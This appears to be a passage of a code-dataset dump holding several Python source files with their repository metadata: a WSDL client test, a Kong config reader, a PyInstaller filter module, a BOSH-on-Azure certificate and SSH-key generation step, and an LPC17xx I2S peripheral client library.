text
stringlengths 4
1.02M
| meta
dict |
|---|---|
from unittest2 import TestCase
# from aux.protocol.rest.jsondl import JSONDL
from aux.protocol.soap.wsdl import WSDLClient
from wsdldatatmp import ssp_wsdl
# Minimal WSDL document used as an in-test stand-in for a real service description.
WSDL_MOCK = '''<wsdl:definitions name="TestService"
targetNamespace="http://www.examples.com/wsdl/HelloService.wsdl"
xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/"
xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
xmlns:tns="http://www.examples.com/wsdl/HelloService.wsdl"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<wsdl:types>
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
</xs:schema>
</wsdl:types>
<wsdl:message name="GetTestRequest">
<wsdl:part element="tns:GetTest" name="GetTestRequest"></wsdl:part>
</wsdl:message>
<wsdl:portType name="testsomething">
<wsdl:operation name="GetTest">
</wsdl:operation>
</wsdl:portType>
<wsdl:service name="TestService">
</wsdl:service>
</wsdl:definitions>
'''
# Minimal JSONDL description; currently unused (the JSONDL import above is commented out).
JSONDL_MOCK = '''
{"api": {},
"types": {}
}
'''
class TestWSDLObject(TestCase):
    # NOTE(review): the 'xtest_' prefix keeps this test disabled — unittest only
    # collects 'test_*' methods. Rename to 'test_...' to re-enable it.
    def xtest_get_test_request(self):
        """Build a WSDL client from the sample 'ssp' WSDL document."""
        wsdl = WSDLClient(wsdl_data=ssp_wsdl)
|
{
"content_hash": "19fae21a498ebea2bbc0724d2e9a56ee",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 72,
"avg_line_length": 26.571428571428573,
"alnum_prop": 0.6810035842293907,
"repo_name": "protojour/aux",
"id": "aba6a97e1dfc31c417fa52f8f092ed6eb0e44482",
"size": "1116",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "test/unit/test_wsdl_jsondl.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "768173"
},
{
"name": "Shell",
"bytes": "103"
}
],
"symlink_target": ""
}
|
import os
import configparser
def read_conf(env_name):
    """Return the *env_name* section of the ``~/.kong`` configuration file.

    :param env_name: name of the INI section to read (e.g. ``"dev"``).
    :return: a ``configparser.SectionProxy`` for that section.
    :raises FileNotFoundError: if ``~/.kong`` does not exist (now carries the path).
    :raises KeyError: if the file exists but has no such section.
    """
    file_path = os.path.join(os.path.expanduser("~"), '.kong')
    # The original wrapped everything in `try/except Exception: raise error`,
    # which added nothing, and raised a bare FileNotFoundError with no path.
    if not os.path.exists(file_path):
        raise FileNotFoundError(file_path)
    pygd_parser = configparser.ConfigParser()
    pygd_parser.read(file_path)
    return pygd_parser[env_name]
|
{
"content_hash": "00d6fa7ae29e8e2f5f26227bbee5b143",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 53,
"avg_line_length": 24.22222222222222,
"alnum_prop": 0.5963302752293578,
"repo_name": "paraizofelipe/kong-wrapper",
"id": "a2c4e03c4418c6023e3a27af3b9d4251d90679ea",
"size": "436",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kong_wrapper/utils.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "23719"
},
{
"name": "Shell",
"bytes": "449"
}
],
"symlink_target": ""
}
|
import os
import finder
import re
import sys
def makefilter(name, xtrapath=None):
    """Create the most specific filter for *name*, as classified by finder."""
    typ, nm, fullname = finder.identify(name, xtrapath)
    if typ in (finder.SCRIPT, finder.GSCRIPT, finder.MODULE):
        # scripts and modules are matched by module name, extension dropped
        basename, _ext = os.path.splitext(nm)
        return ModFilter([basename])
    elif typ == finder.PACKAGE:
        return PkgFilter([fullname])
    elif typ == finder.DIRECTORY:
        return DirFilter([fullname])
    elif typ in (finder.BINARY, finder.PBINARY):
        # binaries are matched by bare file name
        return FileFilter([nm])
    else:
        return FileFilter([fullname])
class _Filter:
def __repr__(self):
return '<'+self.__class__.__name__+' '+repr(self.elements)+'>'
class _NameFilter(_Filter):
    """A filter mixin that matches exactly on a resource's name."""
    def matches(self, res):
        # unknown names fall back to 0 (no match)
        if res.name in self.elements:
            return self.elements[res.name]
        return 0
class _PathFilter(_Filter):
    """A filter mixin that matches when a resource lies below one of our paths."""
    def matches(self, res):
        # Walk up the directory chain; `len > 3` stops near the filesystem
        # root ('C:\\' or '/'). Note the path itself is never tested, only
        # its ancestors — same as the original.
        candidate = os.path.normcase(os.path.abspath(res.path))
        while len(candidate) > 3:
            candidate = os.path.dirname(candidate)
            if self.elements.get(candidate, 0):
                return 1
        return 0
class _ExtFilter(_Filter):
    """A filter mixin keyed on file extension (include or exclude mode)."""
    include = 0
    def matches(self, res):
        ext = os.path.splitext(res.path)[1]
        hit = self.elements.get(ext, 0)
        # in include mode the sense is inverted: unlisted extensions match
        return (not hit) if self.include else hit
class _TypeFilter(_Filter):
    """A filter mixin keyed on resource type (include or exclude mode)."""
    include = 0
    def matches(self, res):
        hit = self.elements.get(res.typ, 0)
        if self.include:
            # include mode: match everything whose type is NOT listed
            return not hit
        return hit
class _PatternFilter(_Filter):
    """A filter that matches when any compiled regex searches in res.path."""
    def matches(self, res):
        for pattern in self.elements:
            if pattern.search(res.path) is not None:
                return 1
        return 0
class ExtFilter(_ExtFilter):
    """A file-extension filter.

    ExtFilter(extlist, include=0) where extlist is a list of file
    extensions; a leading dot is added when missing.
    """
    def __init__(self, extlist, include=0):
        normalized = [e if e[0:1] == '.' else '.' + e for e in extlist]
        self.elements = dict.fromkeys(normalized, 1)
        self.include = include
class TypeFilter(_TypeFilter):
    """A resource-type filter.

    TypeFilter(typlist, include=0) where typlist is a subset of
    ['a','b','d','m','p','s','x','z'].
    """
    def __init__(self, typlist, include=0):
        self.elements = dict.fromkeys(typlist, 1)
        self.include = include
class FileFilter(_NameFilter):
    """A filter for data files, matched by exact name."""
    def __init__(self, filelist):
        self.elements = dict.fromkeys(filelist, 1)
class ModFilter(_NameFilter):
    """A filter for Python modules, e.g. ModFilter(['macpath', 'dospath'])."""
    def __init__(self, modlist):
        self.elements = dict.fromkeys(modlist, 1)
class DirFilter(_PathFilter):
    """A directory filter.

    DirFilter(dirlist): dirs may be relative and are normalized;
    anything in a subdirectory of one of them is excluded.
    """
    def __init__(self, dirlist):
        self.elements = {}
        for raw in dirlist:
            self.elements[os.path.normcase(os.path.abspath(raw))] = 1
class PkgFilter(_PathFilter):
    """Currently identical to DirFilter; packages must be full directories."""
    def __init__(self, pkglist):
        self.elements = {}
        for pkg in pkglist:
            normalized = os.path.normcase(os.path.abspath(pkg))
            self.elements[normalized] = 1
class StdLibFilter(_PathFilter):
    """Excludes anything found under the standard library directory."""
    def __init__(self):
        stdlib = os.path.normcase(os.path.join(sys.exec_prefix, 'lib'))
        self.elements = {stdlib: 1}
class PatternFilter(_PatternFilter):
    """Excludes resources whose path matches any of the given regex patterns."""
    def __init__(self, patterns):
        self.elements = [re.compile(p) for p in patterns]
|
{
"content_hash": "defc0f8cfe03dbe4c27a022830a1a485",
"timestamp": "",
"source": "github",
"line_count": 131,
"max_line_length": 80,
"avg_line_length": 33.48091603053435,
"alnum_prop": 0.5809393524851801,
"repo_name": "toontownfunserver/Panda3D-1.9.0",
"id": "aa0c0203e2e0ed4617b08fc04ca9b6c7330ac920",
"size": "4386",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "direct/pyinst/tocfilter.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "1186"
},
{
"name": "C",
"bytes": "1824481"
},
{
"name": "C#",
"bytes": "8440"
},
{
"name": "C++",
"bytes": "5471478"
},
{
"name": "Emacs Lisp",
"bytes": "147093"
},
{
"name": "F#",
"bytes": "2310"
},
{
"name": "Forth",
"bytes": "506"
},
{
"name": "GLSL",
"bytes": "1040"
},
{
"name": "JavaScript",
"bytes": "7003"
},
{
"name": "MAXScript",
"bytes": "1745"
},
{
"name": "Makefile",
"bytes": "895"
},
{
"name": "Mask",
"bytes": "969"
},
{
"name": "NSIS",
"bytes": "1009441"
},
{
"name": "Objective-C",
"bytes": "15934"
},
{
"name": "Pascal",
"bytes": "4986"
},
{
"name": "Perl6",
"bytes": "30052"
},
{
"name": "Puppet",
"bytes": "259"
},
{
"name": "Python",
"bytes": "17733821"
},
{
"name": "Shell",
"bytes": "12056"
},
{
"name": "Tcl",
"bytes": "2084458"
}
],
"symlink_target": ""
}
|
from subprocess import call
from os import makedirs
from os import path
from shutil import copy
from jinja2 import Environment
from subprocess import Popen, PIPE
def do_step(context):
    """Generate the BOSH SSH keypair and self-signed HAProxy certificate.

    Reads context.meta['settings'] and mutates it in place (adds
    SSH_PUB_KEY, cf_ip and ha_proxy_cert); returns the same context.
    Shells out to ssh-keygen and openssl, so both must be on PATH.
    """
    if not path.isdir("bosh/manifests"):
        makedirs("bosh/manifests")
    if not path.isdir("bosh/certs"):
        makedirs("bosh/certs")
    settings = context.meta['settings']
    # Generate the private key and certificate
    call("ssh-keygen -b 2048 -t rsa -f ./id_rsa_bosh -q -N ''", shell=True)
    copy("id_rsa_bosh", "./bosh")
    copy("id_rsa_bosh.pub", "./bosh")
    with open('id_rsa_bosh.pub', 'r') as tmpfile:
        ssh_key = tmpfile.read()
    settings['SSH_PUB_KEY'] = ssh_key
    # Mirror the dashed key under an underscore name ('-' is not a valid
    # identifier character inside a Jinja template expression).
    settings['cf_ip'] = settings['cf-ip']
    # template openssl config
    env = Environment()
    template_path = "certs/openssl.conf"
    with open(template_path, 'r') as f:
        contents = f.read()
    contents = env.from_string(contents).render(settings)
    with open(path.join('bosh', template_path), 'w') as f:
        f.write(contents)
    cf_ip = settings["cf-ip"]
    call("openssl genrsa -out bosh/certs/server.key 2048", shell=True)
    call("openssl req -new -out bosh/certs/sub1.csr -key bosh/certs/server.key -config bosh/certs/openssl.conf -subj \"/C=US/ST=CA/L=San Francisco/O=Pivotal Labs/OU=Platform Engineering/CN={0}.cf.pcfazure.com\"".format(cf_ip), shell=True)
    call("openssl req -text -noout -in bosh/certs/sub1.csr", shell=True)
    call("openssl x509 -req -days 3650 -in bosh/certs/sub1.csr -signkey bosh/certs/server.key -out bosh/certs/sub1.crt -extensions v3_req -extfile bosh/certs/openssl.conf", shell=True)
    call("openssl x509 -in bosh/certs/sub1.crt -text -noout", shell=True)
    # Bundle cert + CSR + key into a single PEM blob for HAProxy.
    p = Popen(['cat', 'bosh/certs/sub1.crt', 'bosh/certs/sub1.csr', 'bosh/certs/server.key'], stdin=PIPE, stdout=PIPE, stderr=PIPE)
    output, err = p.communicate()
    # NOTE(review): under Python 3 `output` is bytes — confirm downstream
    # consumers of ha_proxy_cert expect bytes (or decode to str here).
    settings['ha_proxy_cert'] = output
    return context
|
{
"content_hash": "5564f448ccfcbdc280093887010fdaed",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 238,
"avg_line_length": 36.074074074074076,
"alnum_prop": 0.6663244353182751,
"repo_name": "cf-platform-eng/bosh-azure-template",
"id": "9641ffa907e88915c6673a238c4e9a1eab722ca5",
"size": "1948",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "install_steps/create_certs.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "43747"
},
{
"name": "Shell",
"bytes": "6319"
}
],
"symlink_target": ""
}
|
"""I2S client library functions. Find implementation details in LPC17xx
CMSIS-Compliant Standard Peripheral Firmware Driver Library documentation.
"""
from internals import robocaller, cstruct
__author__ = "Neil MacMunn"
__credits__ = ["Neil MacMunn", "NXP MCU SW Application Team"]
__maintainer__ = "Neil MacMunn"
__email__ = "neil@gumstix.com"
__copyright__ = "Copyright 2011, Gumstix Inc"
__license__ = "BSD 2-Clause"
__version__ = "0.1"
# I2S configuration parameter defines (mirroring the C macros of the
# LPC17xx CMSIS driver header, lpc17xx_i2s.h).
# I2S Wordwidth bit
I2S_WORDWIDTH_8 = ((0))
I2S_WORDWIDTH_16 = ((1))
I2S_WORDWIDTH_32 = ((3))
# I2S Channel bit
I2S_STEREO = ((0))
I2S_MONO = ((1))
# I2S Master/Slave mode bit
I2S_MASTER_MODE = ((0))
I2S_SLAVE_MODE = ((1))
# I2S Stop bit
I2S_STOP_ENABLE = ((1))
I2S_STOP_DISABLE = ((0))
# I2S Reset bit
I2S_RESET_ENABLE = ((1))
I2S_RESET_DISABLE = ((0))
# I2S Mute bit
I2S_MUTE_ENABLE = ((1))
I2S_MUTE_DISABLE = ((0))
# I2S Transmit/Receive bit
I2S_TX_MODE = ((0))
I2S_RX_MODE = ((1))
# I2S Clock Select bit
I2S_CLKSEL_FRDCLK = ((0))
I2S_CLKSEL_MCLK = ((2))
# I2S 4-pin Mode bit
I2S_4PIN_ENABLE = ((1))
I2S_4PIN_DISABLE = ((0))
# I2S MCLK Enable bit
I2S_MCLK_ENABLE = ((1))
I2S_MCLK_DISABLE = ((0))
# I2S select DMA bit
I2S_DMA_1 = ((0))
I2S_DMA_2 = ((1))
# Macro defines for DAO - Digital Audio Output register
# I2S word width - the number of bytes in data
# 8 bit
I2S_DAO_WORDWIDTH_8 = ((0))
# 16 bit
I2S_DAO_WORDWIDTH_16 = ((1))
# 32 bit
I2S_DAO_WORDWIDTH_32 = ((3))
# I2S control mono or stereo format
I2S_DAO_MONO = ((1<<2))
# I2S control stop mode
I2S_DAO_STOP = ((1<<3))
# I2S control reset mode
I2S_DAO_RESET = ((1<<4))
# I2S control master/slave mode
I2S_DAO_SLAVE = ((1<<5))
def I2S_DAO_WS_HALFPERIOD(n):
    """Encode the DAO word-select half period (period minus one) at bits 6+.

    NOTE(review): unlike the DAI variant, this does not mask n to 9 bits —
    confirm against lpc17xx_i2s.h before relying on out-of-range values.
    """
    return n << 6
# I2S control mute mode
I2S_DAO_MUTE = 1 << 15
# Macro defines for DAI - Digital Audio Input register
I2S_DAI_WORDWIDTH_8 = 0     # 8-bit samples
I2S_DAI_WORDWIDTH_16 = 1    # 16-bit samples
I2S_DAI_WORDWIDTH_32 = 3    # 32-bit samples
I2S_DAI_MONO = 1 << 2       # mono (vs stereo) format
I2S_DAI_STOP = 1 << 3       # stop mode
I2S_DAI_RESET = 1 << 4      # reset mode
I2S_DAI_SLAVE = 1 << 5      # slave (vs master) mode
def I2S_DAI_WS_HALFPERIOD(n):
    """Encode the DAI word-select half period minus one (9 bits) at bits 6+."""
    return (n & 0x1FF) << 6
I2S_DAI_MUTE = 1 << 15      # mute mode
# Macro defines for STAT register (Status Feedback register)
I2S_STATE_IRQ = 1        # receive or transmit interrupt pending
I2S_STATE_DMA1 = 1 << 1  # receive or transmit DMA1 request
I2S_STATE_DMA2 = 1 << 2  # receive or transmit DMA2 request
def I2S_STATE_RX_LEVEL(n):
    """Encode the current receive-FIFO level (5 bits) starting at bit 8."""
    return (n & 0x1F) << 8
def I2S_STATE_TX_LEVEL(n):
    """Encode the current transmit-FIFO level (5 bits) starting at bit 16."""
    return (n & 0x1F) << 16
# Macro defines for DMA1 register (DMA1 Configuration register)
I2S_DMA1_RX_ENABLE = 1       # enable DMA1 for I2S receive
I2S_DMA1_TX_ENABLE = 1 << 1  # enable DMA1 for I2S transmit
def I2S_DMA1_RX_DEPTH(n):
    """FIFO level (5 bits, bits 8..12) that triggers a receive DMA request on DMA1."""
    return (n & 0x1F) << 8
def I2S_DMA1_TX_DEPTH(n):
    """FIFO level (5 bits, bits 16..20) that triggers a transmit DMA request on DMA1."""
    return (n & 0x1F) << 16
# Macro defines for DMA2 register (DMA2 Configuration register)
I2S_DMA2_RX_ENABLE = 1       # enable DMA2 for I2S receive
I2S_DMA2_TX_ENABLE = 1 << 1  # enable DMA2 for I2S transmit
def I2S_DMA2_RX_DEPTH(n):
    """FIFO level (5 bits, bits 8..12) that triggers a receive DMA request on DMA2."""
    return (n & 0x1F) << 8
def I2S_DMA2_TX_DEPTH(n):
    """FIFO level (5 bits, bits 16..20) that triggers a transmit DMA request on DMA2."""
    return (n & 0x1F) << 16
# Macro defines for IRQ register (Interrupt Request Control register)
I2S_IRQ_RX_ENABLE = 1       # enable the I2S receive interrupt
I2S_IRQ_TX_ENABLE = 1 << 1  # enable the I2S transmit interrupt
def I2S_IRQ_RX_DEPTH(n):
    """Receive-FIFO level (5 bits, bits 8..12) at which an IRQ is requested."""
    return (n & 0x1F) << 8
def I2S_IRQ_TX_DEPTH(n):
    """Transmit-FIFO level (5 bits, bits 16..20) at which an IRQ is requested."""
    return (n & 0x1F) << 16
# Macro defines for TXRATE/RXRATE register (Transmit/Receive Clock Rate register)
def I2S_TXRATE_Y_DIVIDER(n):
    '''I2S transmit MCLK fractional-rate denominator (Y, bits 0..7).
    '''
    return ((n&0xFF))
def I2S_TXRATE_X_DIVIDER(n):
    '''I2S transmit MCLK fractional-rate numerator (X, bits 8..15).

    Doc fix: the original docstring said "denominator"; per the LPC176x
    user manual the X field of TXRATE is the numerator of the X/Y divider.
    '''
    return (((n&0xFF)<<8))
def I2S_RXRATE_Y_DIVIDER(n):
    '''I2S receive MCLK fractional-rate denominator (Y, bits 0..7).
    '''
    return ((n&0xFF))
def I2S_RXRATE_X_DIVIDER(n):
    '''I2S receive MCLK fractional-rate numerator (X, bits 8..15).
    '''
    return (((n&0xFF)<<8))
# Macro defines for TXBITRATE & RXBITRATE register
def I2S_TXBITRATE(n):
    """Transmit Bit Rate register value (6 bits)."""
    return n & 0x3F
def I2S_RXBITRATE(n):
    """Receive Bit Rate register value (6 bits)."""
    return n & 0x3F
# Macro defines for TXMODE/RXMODE register (Transmit/Receive Mode Control register)
def I2S_TXMODE_CLKSEL(n):
    """Transmit clock-source selection (2 bits)."""
    return n & 0x03
I2S_TXMODE_4PIN_ENABLE = 1 << 2  # transmit 4-pin mode
I2S_TXMODE_MCENA = 1 << 3        # enable the TX_MCLK output
def I2S_RXMODE_CLKSEL(n):
    """Receive clock-source selection (2 bits)."""
    return n & 0x03
I2S_RXMODE_4PIN_ENABLE = 1 << 2  # receive 4-pin mode
I2S_RXMODE_MCENA = 1 << 3        # enable the MCLK output on the receive side
def PARAM_I2Sx(n):
    '''Macro to determine if it is a valid I2S peripheral.

    NOTE(review): LPC_I2S is not defined in this module; it is presumably
    supplied by the surrounding library — confirm before calling.
    '''
    return ((n)==(LPC_I2S))
def PRAM_I2S_FREQ(freq):
    '''Macro to check that a sample frequency is within the valid
    16 kHz .. 96 kHz range.

    NOTE(review): the name keeps the original "PRAM" spelling (presumably a
    typo for "PARAM") for backward compatibility with existing callers.
    '''
    return ((freq>=16000)and(freq <= 96000))
def PARAM_I2S_WORDWIDTH(n):
    '''Macro check I2S word width type.
    '''
    return ((n==I2S_WORDWIDTH_8) or (n==I2S_WORDWIDTH_16) or (n==I2S_WORDWIDTH_32))
def PARAM_I2S_CHANNEL(n):
    '''Macro check I2S channel type.
    '''
    return ((n==I2S_STEREO) or (n==I2S_MONO))
def PARAM_I2S_WS_SEL(n):
    '''Macro check I2S master/slave mode.
    '''
    return ((n==I2S_MASTER_MODE)or(n==I2S_SLAVE_MODE))
def PARAM_I2S_STOP(n):
    '''Macro check I2S stop mode.
    '''
    return ((n==I2S_STOP_ENABLE)or(n==I2S_STOP_DISABLE))
def PARAM_I2S_RESET(n):
    '''Macro check I2S reset mode.
    '''
    return ((n==I2S_RESET_ENABLE)or(n==I2S_RESET_DISABLE))
def PARAM_I2S_MUTE(n):
    '''Macro check I2S mute mode.  (Doc fix: the original said "reset mode".)
    '''
    return ((n==I2S_MUTE_ENABLE)or(n==I2S_MUTE_DISABLE))
def PARAM_I2S_TRX(n):
    '''Macro check I2S transmit/receive mode.
    '''
    return ((n==I2S_TX_MODE)or(n==I2S_RX_MODE))
def PARAM_I2S_CLKSEL(n):
    '''Macro check I2S clock select mode.
    '''
    return ((n==I2S_CLKSEL_FRDCLK)or(n==I2S_CLKSEL_MCLK))
def PARAM_I2S_4PIN(n):
    '''Macro check I2S 4-pin mode.
    '''
    return ((n==I2S_4PIN_ENABLE)or(n==I2S_4PIN_DISABLE))
def PARAM_I2S_MCLK(n):
    '''Macro check I2S MCLK mode.
    '''
    return ((n==I2S_MCLK_ENABLE)or(n==I2S_MCLK_DISABLE))
def PARAM_I2S_DMA(n):
    '''Macro check I2S DMA mode.
    '''
    return ((n==I2S_DMA_1)or(n==I2S_DMA_2))
def PARAM_I2S_DMA_DEPTH(n):
    '''Macro check I2S DMA depth value (valid range 0..31).

    Bug fix: the original used `or` between the two bounds, which made the
    check true for every integer; both bounds must hold.
    '''
    return ((n>=0)and(n<=31))
def PARAM_I2S_IRQ_LEVEL(n):
    '''Macro check I2S irq level value (valid range 0..31).

    Bug fix: the original used `or` between the two bounds, which accepted
    every integer; both bounds must hold.
    '''
    return ((n>=0)and(n<=31))
def PARAM_I2S_HALFPERIOD(n):
    '''Macro check I2S half-period value (exclusive range: 0 < n < 512).
    '''
    return 0 < n < 512
def PARAM_I2S_BITRATE(n):
    '''Macro check I2S bit-rate value (inclusive range: 0..63).
    '''
    return 0 <= n <= 63
class I2S_CFG_Type(cstruct):
    '''I2S configuration structure definition (passed to I2S_Config).
    wordwidth: the number of bytes in data as follow:
    I2S_WORDWIDTH_8: 8 bit data
    I2S_WORDWIDTH_16: 16 bit data
    I2S_WORDWIDTH_32: 32 bit data
    mono: Set mono/stereo mode, should be:
    I2S_STEREO: stereo mode
    I2S_MONO: mono mode
    stop: Disables accesses on FIFOs, should be:
    I2S_STOP_ENABLE: enable stop mode
    I2S_STOP_DISABLE: disable stop mode
    reset: Asynchronously reset the transmit channel and FIFO, should be:
    I2S_RESET_ENABLE: enable reset mode
    I2S_RESET_DISABLE: disable reset mode
    ws_sel: Set Master/Slave mode, should be:
    I2S_MASTER_MODE: I2S master mode
    I2S_SLAVE_MODE: I2S slave mode
    mute: MUTE mode: when true, the transmit channel sends only zeroes, should be:
    I2S_MUTE_ENABLE: enable mute mode
    I2S_MUTE_DISABLE: disable mute mode
    ptr: LPC1769 memory address where structure is stored. Use this in place of
    the C reference operator (&).
    '''
    pass
class I2S_DMAConf_Type(cstruct):
    '''I2S DMA configuration structure definition (passed to I2S_DMAConfig).
    DMAIndex: Select DMA1 or DMA2, should be:
    I2S_DMA_1: DMA1
    I2S_DMA_2: DMA2
    depth: FIFO level that triggers a DMA request
    ptr: LPC1769 memory address where structure is stored. Use this in place of
    the C reference operator (&).
    '''
    pass
class I2S_MODEConf_Type(cstruct):
    '''I2S mode configuration structure definition (passed to I2S_ModeConfig).
    clksel: Clock source selection, should be:
    I2S_CLKSEL_FRDCLK: Select the fractional rate divider clock output
    I2S_CLKSEL_MCLK: Select the MCLK signal as the clock source
    fpin: Select four pin mode, should be:
    I2S_4PIN_ENABLE: 4-pin enable
    I2S_4PIN_DISABLE: 4-pin disable
    mcena: Select MCLK mode, should be:
    I2S_MCLK_ENABLE: MCLK enable for output
    I2S_MCLK_DISABLE: MCLK disable for output
    ptr: LPC1769 memory address where structure is stored. Use this in place of
    the C reference operator (&).
    '''
    pass
# Remote wrappers: each call is marshalled to the board via robocaller, which
# runs the corresponding CMSIS driver function and returns its result.
def I2S_GetLevel(I2Sx, TRMode):
    '''Get I2S Buffer Level.
    I2Sx: I2S peripheral selected, should be: LPC_I2S
    TRMode: Transmit/receive mode, should be:
    I2S_TX_MODE = 0: transmit mode
    I2S_RX_MODE = 1: receive mode
    return: current level of the Transmit/Receive Buffer
    '''
    return robocaller("I2S_GetLevel", "uint8_t", I2Sx, TRMode)
def I2S_GetIRQDepth(I2Sx, TRMode):
    '''Get I2S interrupt depth.
    I2Sx: I2S peripheral selected, should be: LPC_I2S
    TRMode: Transmit/receive mode, should be:
    I2S_TX_MODE = 0: transmit mode
    I2S_RX_MODE = 1: receive mode
    return: depth of the FIFO level on which to create an irq request
    '''
    return robocaller("I2S_GetIRQDepth", "uint8_t", I2Sx, TRMode)
def I2S_Mute(I2Sx, TRMode):
    '''Mute the selected I2S channel.
    I2Sx: I2S peripheral selected, should be: LPC_I2S
    TRMode: Transmit/receive mode, should be:
    I2S_TX_MODE = 0: transmit mode
    I2S_RX_MODE = 1: receive mode
    '''
    return robocaller("I2S_Mute", "void", I2Sx, TRMode)
def I2S_Start(I2Sx):
    '''Clear the STOP, RESET and MUTE bits so the peripheral is ready to operate.
    I2Sx: I2S peripheral selected, should be: LPC_I2S
    '''
    return robocaller("I2S_Start", "void", I2Sx)
def I2S_Pause(I2Sx, TRMode):
    '''Pause the selected I2S channel.
    I2Sx: I2S peripheral selected, should be: LPC_I2S
    TRMode: Transmit/receive mode, should be:
    I2S_TX_MODE = 0: transmit mode
    I2S_RX_MODE = 1: receive mode
    '''
    return robocaller("I2S_Pause", "void", I2Sx, TRMode)
def I2S_Init(I2Sx):
    '''Initialize the I2S peripheral (remote driver call).
    I2Sx: I2S peripheral selected, should be: LPC_I2S
    '''
    return robocaller("I2S_Init", "void", I2Sx)
def I2S_SetBitRate(I2Sx, bitrate, TRMode):
    '''Set the I2S bit rate.
    I2Sx: I2S peripheral selected, should be: LPC_I2S
    bitrate: bitrate value, should be in range: 0 .. 63
    TRMode: Transmit/receive mode, should be:
    I2S_TX_MODE = 0: transmit mode
    I2S_RX_MODE = 1: receive mode
    '''
    return robocaller("I2S_SetBitRate", "void", I2Sx, bitrate, TRMode)
def I2S_FreqConfig(I2Sx, Freq, TRMode):
    '''Set the sample frequency for I2S.
    I2Sx: I2S peripheral selected, should be: LPC_I2S
    Freq: The frequency to be set. It can range from 16-96 kHz (16, 22.05, 32,
    44.1, 48, 96 kHz)
    TRMode: Transmit/receive mode, should be:
    I2S_TX_MODE = 0: transmit mode
    I2S_RX_MODE = 1: receive mode
    return: Status: ERROR or SUCCESS
    '''
    return robocaller("I2S_FreqConfig", "Status", I2Sx, Freq, TRMode)
def I2S_DMACmd(I2Sx, DMAIndex, TRMode, NewState):
    '''Enable/Disable DMA operation for I2S.
    I2Sx: I2S peripheral selected, should be: LPC_I2S
    DMAIndex: chooses which DMA is used, should be:
    I2S_DMA_1 = 0: DMA1
    I2S_DMA_2 = 1: DMA2
    TRMode: Transmit/receive mode, should be:
    I2S_TX_MODE = 0: transmit mode
    I2S_RX_MODE = 1: receive mode
    NewState: new state of DMA operation, should be:
    ENABLE
    DISABLE
    '''
    return robocaller("I2S_DMACmd", "void", I2Sx, DMAIndex, TRMode, NewState)
def I2S_Send(I2Sx, BufferData):
    '''Send one I2S data word.
    I2Sx: I2S peripheral selected, should be: LPC_I2S
    BufferData: the 32-bit data value to be sent
    '''
    return robocaller("I2S_Send", "void", I2Sx, BufferData)
def I2S_Receive(I2Sx):
    '''Receive one I2S data word.
    I2Sx: I2S peripheral selected, should be: LPC_I2S
    return: received value
    '''
    return robocaller("I2S_Receive", "uint32_t", I2Sx)
def I2S_DeInit(I2Sx):
    '''Deinitialize I2S transmit or receive.
    I2Sx: I2S peripheral selected, should be: LPC_I2S
    '''
    return robocaller("I2S_DeInit", "void", I2Sx)
def I2S_Config(I2Sx, TRMode, ConfigStruct):
    '''Configure I2S.
    I2Sx: I2S peripheral selected, should be: LPC_I2S
    TRMode: Transmit/receive mode, should be:
    I2S_TX_MODE = 0: transmit mode
    I2S_RX_MODE = 1: receive mode
    ConfigStruct: pointer to an I2S_CFG_Type structure which will be used
    '''
    return robocaller("I2S_Config", "void", I2Sx, TRMode, ConfigStruct)
def I2S_IRQCmd(I2Sx, TRMode, NewState):
    '''Enable/Disable the IRQ for I2S.
    I2Sx: I2S peripheral selected, should be: LPC_I2S
    TRMode: Transmit/receive mode, should be:
    I2S_TX_MODE = 0: transmit mode
    I2S_RX_MODE = 1: receive mode
    NewState: ENABLE or DISABLE
    '''
    return robocaller("I2S_IRQCmd", "void", I2Sx, TRMode, NewState)
def I2S_IRQConfig(I2Sx, TRMode, level):
    '''Configure the IRQ for I2S.
    I2Sx: I2S peripheral selected, should be: LPC_I2S
    TRMode: Transmit/receive mode, should be:
    I2S_TX_MODE = 0: transmit mode
    I2S_RX_MODE = 1: receive mode
    level: the FIFO level that triggers an IRQ request
    '''
    return robocaller("I2S_IRQConfig", "void", I2Sx, TRMode, level)
def I2S_Stop(I2Sx, TRMode):
    '''Stop the selected I2S channel.
    I2Sx: I2S peripheral selected, should be: LPC_I2S
    TRMode: Transmit/receive mode, should be:
    I2S_TX_MODE = 0: transmit mode
    I2S_RX_MODE = 1: receive mode
    '''
    return robocaller("I2S_Stop", "void", I2Sx, TRMode)
def I2S_DMAConfig(I2Sx, DMAConfig, TRMode):
    '''Configure DMA operation for I2S.
    I2Sx: I2S peripheral selected, should be: LPC_I2S
    DMAConfig: pointer to an I2S_DMAConf_Type used for configuration
    TRMode: Transmit/receive mode, should be:
    I2S_TX_MODE = 0: transmit mode
    I2S_RX_MODE = 1: receive mode
    '''
    return robocaller("I2S_DMAConfig", "void", I2Sx, DMAConfig, TRMode)
def I2S_ModeConfig(I2Sx, ModeConfig, TRMode):
    '''Configure the operating mode for I2S.
    I2Sx: I2S peripheral selected, should be: LPC_I2S
    ModeConfig: pointer to an I2S_MODEConf_Type used for configuration
    TRMode: Transmit/receive mode, should be:
    I2S_TX_MODE = 0: transmit mode
    I2S_RX_MODE = 1: receive mode
    '''
    return robocaller("I2S_ModeConfig", "void", I2Sx, ModeConfig, TRMode)
def I2S_GetIRQStatus(I2Sx, TRMode):
    '''Get the I2S interrupt status.
    I2Sx: I2S peripheral selected, should be: LPC_I2S
    TRMode: Transmit/receive mode, should be:
    I2S_TX_MODE = 0: transmit mode
    I2S_RX_MODE = 1: receive mode
    return: FunctionalState, should be: ENABLE or DISABLE
    '''
    return robocaller("I2S_GetIRQStatus", "FunctionalState", I2Sx, TRMode)
|
{
